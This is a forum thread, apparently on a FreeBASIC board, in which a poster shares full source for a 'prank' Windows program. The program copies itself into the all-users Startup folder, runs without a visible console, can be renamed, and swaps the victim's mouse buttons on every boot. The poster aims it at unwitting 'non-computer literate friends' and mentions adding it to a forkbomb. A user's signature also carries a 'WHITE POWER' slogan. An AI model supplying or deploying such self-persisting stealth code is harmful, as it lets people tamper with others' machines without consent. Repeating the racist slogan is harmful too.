Thread Rating:
  • 0 Vote(s) - 0 Average
Prank People with - Mouse Swapper (exe name can be changed!)
Here's a modifiable .exe that swaps the mouse on windows each time it starts up.

Compile with -s gui for stealth (after a restart is done. The first time the program runs the stupid shell pops up)

Also, this program finds the exe path automatically, meaning, you can CHANGE THE EXE NAME and still have this work! This makes the program a *great* prank!

Well I hope you have fun screwing with your non-computer literate friends! See ya.

Code:
#include once "windows.bi"
#Include "crt.bi"
function exist(byval filename as string)
  return len(dir(filename))
end function

if exist("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" + dir(command(0))) then

SwapMouseButton(1)

else

Shell "Copy " + dir(command(0)) + " ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\"""

end if

First: The program checks if it already exists.

Second: If it does exist, it swaps the mouse, if not, it copies itself into the auto-start directory on Windows.

This prevents it from trying to copy onto itself, and keeps it stealthy on windows startup.
Hehe... maybe I can add this code to my ever-growing forkbomb program to screw everything up even more!

edit: It doesn't work.
Glarplesnarkleflibbertygibbertygarbethparkentalelelangathaffendoinkadonkeydingdonkaspamahedron.
Quote:edit: It doesn't work.
First off, I've only tested it with Windows XP so maybe the path is different. *shrug* - I could just have it copy to *all* possible paths for the different windows systems if they are different.

Restart your computer, or run it again.

It compiled and worked for me just now, FB version .16 latest testing release. *uses right mouse button and hits submit*

It doesn't detect mouse settings, so if you already have the right mouse as your *lead* clicker then nothing should happen.
note to self: never download any exes from either minideath or TheAdventMaster.
quote="whitetiger0990"]whitetiger is.. WHITE POWER!!! [/quote]
Here
Quote:
thegrogen Wrote:edit: It doesn't work.
First off, I've only tested it with Windows XP so maybe the path is different. *shrug* - I could just have it copy to *all* possible paths for the different windows systems if they are different.

Restart your computer, or run it again.

It compiled and worked for me just now, FB version .16 latest testing release. *uses right mouse button and hits submit*

It doesn't detect mouse settings, so if you already have the right mouse as your *lead* clicker then nothing should happen.

I'm using XP.... Ah. Must be because I'm using .15 right now, I haven't had the chance to go on CVS and download the new version yet.
Glarplesnarkleflibbertygibbertygarbethparkentalelelangathaffendoinkadonkeydingdonkaspamahedron.
Quote:note to self: never download any exes from either minideath or TheAdventMaster.
Wtf? I wouldn't have posted it here if I thought I'd get stupid responses like that.

Sheesh, it just switches the mouse buttons. I posted it here, as a little prank program that I used on a friend for April Fools Day.

I would NEVER put malicious code in an exe without making sure the people running it know darn well what it does (even though this isn't really a malicious program, I guess it fits in that category).
:rotfl:
quote="whitetiger0990"]whitetiger is.. WHITE POWER!!! [/quote]
Here
Quote:note to self: never download any exes from either minideath or TheAdventMaster.
*also notes to self*
[Image: freebasic.png]
*Le Cries*
Quote:
Dio Wrote:note to self: never download any exes from either minideath or TheAdventMaster.
*also notes to self*

note to self: Remember to investigate fully any exe's from anybody ever, as i usually would.
EVEN MEN OF STEEL RUST.
[Image: chav.gif]